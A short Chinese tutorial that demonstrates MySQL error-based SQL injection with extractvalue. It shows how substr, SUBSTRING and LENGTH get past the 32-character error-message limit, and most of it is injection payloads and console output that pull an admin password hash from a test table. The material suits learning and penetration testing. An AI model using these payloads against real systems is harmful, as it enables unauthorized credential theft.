0x00 概要
在使用 extractvalue或是updatexml报错注入 方法时可能会出现一种情况要获取的数据大于了 32 位导致显示不完整。
这里展示两种常用突破方法
0x01 substr函数
方法1-sql: select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,substr(password,1,10),0x7e) FROM test.tdb_admin limit 0,1)))
方法1-sql讲解: select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,substr(字段名称,开始读取的位置,指定显示的长度),0x7e) FROM 库名.表名 limit 0,1)))
mysql> select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,substr(password,1,10),0x7e) FROM test.tdb_admin limit 0,1)));
ERROR 1105 (HY000): XPATH syntax error: '~~7fef617146~'
0x02 SUBSTRING 函数+LENGTH 函数
用法:
substring(str, pos),即: substring(被截取字符串, 从第几位开始截取)
substring(str, pos, length)
即: substring(被截取字符串,从第几位开始截取,截取长度)
使用这个函数的时候最好是搭配 length 函数一起使用,先获取数据长度,然后在通过偏移获取数据
# 测试表数据:
mysql> select * from tdb_admin;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 7fef6171469e80d32c0559f88b377245 |
+----+----------+----------------------------------+
1 row in set (0.00 sec)
先获取某字段的数据长度: select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,length(password),0x7e) FROM test.tdb_admin limit 0,1)))
mysql> select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,length(password),0x7e) FROM test.tdb_admin limit 0,1)));
ERROR 1105 (HY000): XPATH syntax error: '~~32~'
获取前30位的数据: select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,SUBSTRING(password,1),0x7e) FROM test.tdb_admin limit 0,1)))
mysql> select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,SUBSTRING(password,1),0x7e) FROM test.tdb_admin limit 0,1)));
ERROR 1105 (HY000): XPATH syntax error: '~~7fef6171469e80d32c0559f88b3772'
select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,SUBSTRING(password,31),0x7e) FROM test.tdb_admin limit 0,1)))
sql讲解: select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,SUBSTRING(字段名,要开始读取的位置),0x7e) FROM 库名.表名 limit 0,1)))
mysql> select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,SUBSTRING(password,31),0x7e) FROM test.tdb_admin limit 0,1)));
ERROR 1105 (HY000): XPATH syntax error: '~~45~'